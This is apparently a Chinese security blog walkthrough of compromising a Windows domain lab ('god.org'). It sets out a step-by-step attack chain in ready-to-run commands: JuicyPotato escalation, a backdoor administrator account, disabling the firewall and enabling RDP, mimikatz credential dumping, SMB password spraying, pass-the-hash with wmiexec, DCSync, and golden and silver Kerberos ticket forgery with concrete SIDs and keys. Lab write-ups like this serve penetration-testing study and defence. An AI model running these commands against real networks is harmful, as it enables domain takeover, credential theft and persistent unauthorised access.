Fscan扫到了域内的机器有数据低权限
![图片[1],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135015460.png?imageView2/0/format/webp/q/75)
![图片[2],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135046333.png?imageView2/0/format/webp/q/75)
激活xp_cmdshell 此时为低权限
![图片[3],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135104375.png?imageView2/0/format/webp/q/75)
四家土豆家族全部GG
工具梭不了 我们手动打
![图片[4],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135113390.png?imageView2/0/format/webp/q/75)
最后用JuicyPotato.exe(为什么选这个 2012首先推荐的就是GodPotato 其次是JuicyPotato)
C:\Users\Public\JuicyPotato.exe -t * -l 1337 -p cmd.exe -a “/c whoami
![图片[5],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135125934.png?imageView2/0/format/webp/q/75)
添加管理员后门到管理组
C:\Users\Public\JuicyPotato.exe -t * -l 1337 -p cmd.exe -a "/c net user test abc!123456 /add && net localgroup administrators test /add"
关闭防火墙开启3389
C:\Users\Public\JuicyPotato.exe -t * -l 1337 -p cmd.exe -a “/c netsh advfirewall set allprofiles state off && reg add \”HKLM\System\CurrentControlSet\Control\Terminal Server\” /v fDenyTSConnections /t REG_DWORD /d 0 /f && net start TermService”
此时就可以直接远程桌面连接了也是管理员权限
上传
![图片[6],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135213381.png?imageView2/0/format/webp/q/75)
dump哈希值(需要管理员权限,此时我们已经是管理员了)
privilege::debug 提权到调试权限
![图片[7],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135219828.png?imageView2/0/format/webp/q/75)
sekurlsa::logonPasswords 抓取登录过的明文密码、NTLM 哈希、PIN 码、密钥
(sekurlsa::msv就算没有明文密码,也能抓到哈希,用来横向移动、PTH 哈希传递(是专门只输出 “纯哈希)可选
因为输出太多 我们直接让他输出到output里
mimikatz.x64.exe “privilege::debug” “sekurlsa::logonPasswords” “sekurlsa::msv” “exit” > output.txt
![图片[8],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135236514.png?imageView2/0/format/webp/q/75)
抓到了两个账号 一个是当前管理员的账号的哈希 另一个是域里面的哈希
疑问 为什么没有抓到我们之前test的账号
因为猕猴桃抓的是缓存,test都没有登录过所以没抓到
抓到administrator的哈希值了此时我们就可以去解密了
![图片[9],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135250320.png?imageView2/0/format/webp/q/75)
查询出来管理员的账号密码是admin!@#45
这个就是我们要收集的密码本
使用admin!@#45去喷洒SMB
fscan.exe -h 192.168.3.1/24 -user administrator -pwda admin!@#45 -m smb
![图片[10],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135300806.png?imageView2/0/format/webp/q/75)
成功喷洒出来另一台哈希值,即使是复杂密码也可以喷洒出来 如果另一个主机是高价值主机/双网卡主机
那么此时我们就具备了横向的条件
如果密码很复杂解密不出来使用wmiexec进行PTH哈希传递
wmiexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.31 “whoami”
![图片[11],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135311791.png?imageView2/0/format/webp/q/75)
这样也可以执行命令
域管也有弱口令
010拿下两台机器 其中一台win7
![图片[12],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702135857339.png?imageView2/0/format/webp/q/75)
域内信息搜集使用sharpHound
![图片[13],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702140049240.png?imageView2/0/format/webp/q/75)
bloodhood分析
![图片[14],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702140855214.png?imageView2/0/format/webp/q/75)
![图片[15],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702140631599.png?imageView2/0/format/webp/q/75)
Adfinder也可以查询
查找域控
![图片[16],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702141419512.png?imageView2/0/format/webp/q/75)
查找域用户
![图片[17],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260702141455537.png?imageView2/0/format/webp/q/75)
主要来到黄金票据和白银票据域内
黄金票据
黄金票据(Golden ticket)
在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个 Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash,就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。
黄金票据常用于权限维持。 当我们获得域控的控制权限后,有可能获取域内所有用户的hash,和krbtgt的hash。这时,由于一些原因导致我们失去对目标的控制权,但是我们还留有一个普通用户的权限,并且krbtgt的密码没有更改,此时我们可以利用krbtgt用户的ntlm hash制作黄金票据伪造tgt,重新获取域控的管理权限。
所需条件
1、域名称
2、域的SID值
3、域的KRBTGT账号的HASH
4、伪造任意用户名 (获取域的SID和KRBTGT账号的NTLM HASH的前提是需要已经拿到了域的权限)
导出所有哈希
lsadump::dcsync /domain:god.org /all /csv
![图片[18],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260703074820800.png?imageView2/0/format/webp/q/75)
SID
![图片[19],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260703075254850.png?imageView2/0/format/webp/q/75)
这个时候就可以做黄金票据了
kerberos::golden /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /aes256:5a75bb9a4fc4453c66621a54af111884f45bbca6365bf4d81bc059f31e708827 /user:Administrator /ptt
把这个黄金票据导入低权限域用户里
![图片[20],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260703075422654.png?imageView2/0/format/webp/q/75)
通过klist查看是否当前系统有黄金票据凭证
![图片[21],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260703080639296.png?imageView2/0/format/webp/q/75)
可以看到有域控的票据了
这样低权限的就可以维权域控的了
![图片[22],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260703080310933.png?imageView2/0/format/webp/q/75)
可以pxexec/wmic执行域控机器的命令
![图片[23],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260703081936434.png?imageView2/0/format/webp/q/75)
白银票据
白银票据是kerberos认证协议的一种攻击手法,与“黄金票据”相对应,它是一种伪造服务票证的攻击,用于攻击已攻陷特定服务器机器账户密码哈希(NTLM哈希)的情况下,直接向服务器进行身份验证,从而访问特定资源。
kerberos::golden:使用minikatz中票据的功能
/domain:指定域名,例如 demo.local
/sid:Client端查询的sid号,在域控中查询也可以,都是一样的,例如S-1-5-21-2708067078-2949266822-4175191696-1105
/target:主域控中的计算机全名
/rc4:在域控中抓取的hash(NTLM)
/service:需要伪造的服务(cifs只是其中的一种服务,可伪造的服务很多)
/user:需要伪造的用户名(可自定义)
/ppt:伪造了以后直接写入到内存中
kerberos::golden /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-God.god.org /service:cifs /rc4:0beb8ee951c8a5407a2e71988e9d597c /user:Administrator /ptt
/service:cifs CIFS = Common Internet File System,Windows 文件共享服务
注入白银票据之后也可以访问域控文件
不同的这个白银票据只有文件共享不能执行其他命令了。
白银票据缺陷
- 不能远程执行命令(PsExec、wmic 不行,需要
host服务票据) - 不能查询 AD、DCSync(需要
ldap服务票据) - 不能远程桌面、管理服务
- 不能访问其他机器(FILESERV\(、SQLSERVER\) 等都不行)
![图片[24],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260703081338724.png?imageView2/0/format/webp/q/75)
AES的是黄金票据 RC4注入的是白银票据
这里注入的白银票据是文件共享服务 只可以文件共享 适合拿下单主机的时候维权更加隐秘 但权限不如黄金票据
![图片[25],域内黄金白银票据,网络安全爱好者中心-神域博客网](https://img.godyu.com/2026/07/20260703081438469.png?imageView2/0/format/webp/q/75)


![[LitCTF]cha0s-Writeup,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/06/20240602034759133.png)
![[5.20]从抖音信息收集到微信小程序sessionkey泄露伪造登录渗透某edu站,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/05/20240520143248539.jpg)


![[5.16]从微信小程序越权渗透某edu站的实例,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/05/20240522095651301.png)





暂无评论内容